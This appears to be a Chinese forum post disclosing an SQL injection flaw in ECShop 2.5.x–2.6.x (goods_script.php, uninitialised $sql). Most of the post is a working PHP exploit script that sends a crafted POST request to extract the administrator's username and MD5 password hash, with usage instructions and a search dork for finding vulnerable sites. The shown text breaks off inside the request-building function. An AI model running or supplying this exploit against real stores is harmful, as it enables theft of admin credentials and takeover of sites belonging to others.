影响2.5.x和2.6.x,其他版本未测试 
goods_script.php 
44行: 

复制代码代码如下:
if (empty($_GET['type'])) 
{ 
... 
} 
elseif ($_GET['type'] == 'collection') 
{ 
... 
} 
$sql .= " LIMIT " . (!empty($_GET['goods_num']) ? intval($_GET['goods_num']) : 10); 
$res = $db->query($sql); 

$sql没有初始化,很明显的一个漏洞:) 
EXP: 

复制代码代码如下:
#!/usr/bin/php 
<?php 
print_r(' 
+---------------------------------------------------------------------------+ 
ECShop<= v2.6.2 SQL injection / admin credentials disclosure exploit 
by puret_t 
mail: puretot at gmail dot com 
team: http://bbs.wolvez.org 
dork: "Powered by ECShop" 
+---------------------------------------------------------------------------+ 
'); 
/** 
* works with register_globals = On 
*/ 
if ($argc < 3) { 
print_r(' 
+---------------------------------------------------------------------------+ 
Usage: php '.$argv[0].' host path 
host: target server (ip/hostname) 
path: path to ecshop 
Example: 
php '.$argv[0].' localhost /ecshop/ 
+---------------------------------------------------------------------------+ 
'); 
exit; 
} 
error_reporting(7); 
ini_set('max_execution_time', 0); 
$host = $argv[1]; 
$path = $argv[2]; 
$resp = send(); 
preg_match('#href="([\S]+):([a-z0-9]{32})"#', $resp, $hash); 
if ($hash) 
exit("Expoilt Success!\nadmin:\t$hash[1]\nPassword(md5):\t$hash[2]\n"); 
else 
exit("Exploit Failed!\n"); 
function send() 
{ 
global $host, $path; 
$cmd = 'sql=SELECT CONCAT(user_name,0x3a,password) as goods_id FROM ecs_admin_user WHERE action_list=0x'.bin2hex('all').' LIMIT 1#'; 
$data = "POST ".$path."goods_script.php?type=".time()." HTTP/1.1\r\n"; 
$data .= "Accept: */*\r\n"; 
$data .= "Accept-Language: zh-cn\r\n"; 
$data .= "Content-Type: application/x-www-form-urlencoded\r\n"; 
$data .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n"; 
$data .= "Host: $host\r\n"; 
$data .= "Content-Length: ".strlen($cmd)."\r\n"; 
$data .= "Connection: Close\r\n\r\n"; 
$data .= $cmd;